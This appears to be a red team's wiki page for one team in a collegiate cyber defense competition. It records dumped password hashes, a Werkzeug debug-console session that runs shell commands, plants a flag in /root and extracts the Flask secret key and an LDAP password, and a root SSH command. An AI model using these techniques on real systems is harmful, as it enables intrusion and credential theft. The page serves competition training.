Team 16 Wiki Page

Team Information
Number: Team 16
Name: Cacttus Shield
IP Range: 168.84.5.0/24
Domain: team16.isucdc.com
Current Place: 13th
Red Teamer(s): None
Service Status
AD LDAP
AD RDP
AD LDAPS
TICKETS HTTP
TICKETS RDP
MGMT HTTP
MGMT SSH
ADMIN HTTP
ADMIN RDP
WWW HTTP
WWW SSH
ADMIN Login
WWW Login
Nmap
root:$6$IKSeF6VheFC/Hc2o$9kuV5c1gGdscQMhLNKWObPgcDUZpusEBf1uEi337jnkp8NXbR7y87uzhH9E3Vlox3.pDIj3Nkli3dvC8xYtiT0:20488:0:99999:7:::
cdc:$6$f8F2tIVX0VkHCuXK$cT2qRYIVGKp9eQVV21x5hOAMJ3wJO6j0qwbOamNkAPXxNZgNas6m6lrOTDbob3HcZGWqOn5fnYJ9hSau28GzL.:20488:0:99999:7:::

Notable Vulnerabilities
[console ready]
>>> import os; os.popen("whoami").read()
'cdc\n'
>>> os.popen("cat /etc/team16_mgmt-etc.flag").read()
'p6g4r00KHJfBWLNr6UuZLlr5TgFaZpzn3Rqapsj097XWL9fInh\n'
>>> os.popen("echo 'GGpkAveRjtoOj41mosUmUbzDLiDFDwHaGvmYfYEc2tO7xwB8HF' > /root/red-flag").read();
''
>>> os.popen("cat /root/red-flag").read()
''
>>> import inspect, flask; apps=list({id(v):v for f in inspect.stack() for v in f.frame.f_locals.values() if isinstance(v, flask.app.Flask)}.values()); apps
[]
>>> app = apps[0]
>>> {k:v for k,v in app.config.items() if "SECRET" in k or "FLAG" in k or "LDAP" in k}
{'SECRET_KEY': '518e5c4a17da4321122f9e648c80f527c16c75f1682808502beb098156a88d29', 'FLAGS': {'train_service_flag': 'dWRvpK3TjHVmQRvmnD6k6NoeNM7WMh6nbTcWByHhF7uM4DNdyL', 'bus_service_flag': 'I8KL049EsWJ4jBf56F1WiJMqs6hDp7PdSgaicg5qSPVQaBRvZQ', 'db_read_flag': 'V7NTmuwT99JhqPq3nIIgSpUyLXXKWpOYv4MoHPcDobj1cSogpd'}, 'LDAP_DN': 'cn=users,dc=team16,dc=isucdc,dc=com', 'LDAP_DOMAIN': 'team16.isucdc.com', 'LDAP_PASS': '7-d7$oYOd2iP', 'LDAP_SERVER': '10.10.10.2', 'LDAP_USER': 'svc_webapp'  }





ssh -i id_key root@168.84.5.250

Notable Defenses
TEAM 16
────────────────────────────────────────────────────────────
  [Team 16] MGMT backend online (HTTP 401)
  [Team 16] Ticket forge: no flag (patched)
  [Team 16] DB flag: not accessible
  [Team 16] Auth bypass: all users rejected (LDAP patched)
  [Team 16] Vehicle flag (bus): not available yet
  [Team 16] Vehicle flag (train): not available yet
  [Team 16] Admin UI online
  [Team 16] Code-server: not accessible (patched or blocked)
  [Team 16] Attempting Werkzeug persistence on MGMT...
  [Team 16] Werkzeug RCE not available (patched)


Team Spirit Issues